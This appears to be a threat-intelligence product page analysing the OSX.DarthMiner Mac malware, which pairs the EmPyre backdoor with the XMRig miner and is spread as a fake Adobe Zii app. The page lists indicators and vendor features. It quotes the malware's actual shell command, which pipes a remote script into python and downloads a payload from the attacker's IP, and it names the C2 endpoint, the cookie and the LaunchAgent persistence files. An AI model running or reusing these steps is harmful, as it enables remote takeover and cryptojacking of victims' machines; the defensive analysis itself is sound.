EmPyre is an open-source post-exploitation backdoor/agent that, in the provided reporting, was used as the remote access component of Mac malware distributed as a fake Adobe Zii application. In that campaign, the malware combined the EmPyre backdoor with the XMRig cryptominer. The fake installer used an Automator applet to execute a shell script that downloaded an obfuscated Python payload from https://ptpb.pw/jj9a and a decoy application from 46.226.108.171:80. The Python payload checked for the presence of Little Snitch and exited if it was detected, then connected to an EmPyre backend at http://46.226.108.171:4444/news.php using the cookie value session=SYDFioywtcFbUR5U3EST96SbqVk=. The EmPyre component gave the attacker the ability to push arbitrary commands to the infected Mac and likely provided full access to the system. Observed follow-on activity included downloading and executing /private/tmp/uploadminer.sh, which installed persistence via LaunchAgents, including com.proxy.initialize.plist for the backdoor and com.apple.rig.plist for the miner, and downloaded xmrig and config.json into /Users/Shared. The malware then launched the XMRig miner persistently. Commented-out code in the script referenced configuring a proxy at 46.226.108.171:8080 and installing a mitmproxy root certificate, which would have enabled interception of web traffic if activated. The reporting states that while observed behavior centered on cryptomining, the presence of the EmPyre backdoor meant the operators could also have executed arbitrary commands, including potential file theft or password capture. The overall malware was detected by Malwarebytes for Mac as OSX.DarthMiner. A related sample hash reported for Adobe Zii.app.zip was ebecdeac53069c9db1207b2e0d1110a73bc289e31b0d3261d903163ca4b1e31e.
Mallory pivots from this family to the IOCs, detections, and named campaigns that touch your stack, and pages you when something new lands.
8 distinct techniques documented for this family, organized by ATT&CK tactic.
Opening the fake Adobe Zii app with Automator reveals the nature of the software, as it simply runs a shell script: curl https://ptpb.pw/jj9a | python - & s=46.226.108.171:80; curl $s/sample.zip -o sample.zip; unzip sample.zip -d sample; cd sample; cd __MACOSX; open -a sample.app
What about the Python script? That turned out to be obfuscated, but was easily deobfuscated...
The malware was being distributed through an application named Adobe Zii... the app was called Adobe Zii, but it was definitely not the real thing... The sample.app is simple. It appears to simply be a version of Adobe Zii, most likely for the purpose of making it appear that the malware was actually “legitimate.”
10 indicators attributed across vendor reports, sandbox runs, and researcher write-ups. Full values are available in Mallory.
IPs, domains, and DNS infrastructure linked to this family.
File hashes (MD5, SHA-1, SHA-256) from samples and reports.
Other indicator types observed in public reporting.
2 sources tracked across advisories, community write-ups, and news. New activity surfaces here as Mallory finds it.
EmPyre is an open-source post-exploitation agent that provides attackers with full access over infected macOS systems. It is often delivered as a second-stage payload via malicious macros in Office documents.
An open-source backdoor used to open a connection to an EmPyre backend, allowing arbitrary commands to be pushed to the infected Mac and enabling persistent remote access.
Match every observed IP, domain, and hash against your live telemetry.
Named campaigns wielding this family, with evidence pinned to each claim.
CVEs this family uses for access and lateral movement.
YARA, Sigma, Snort, and vendor rules, auto-deployed to your SIEM.
Every documented technique, ranked by evidence weight.
Reddit, Mastodon, and CTI community discussion around this family.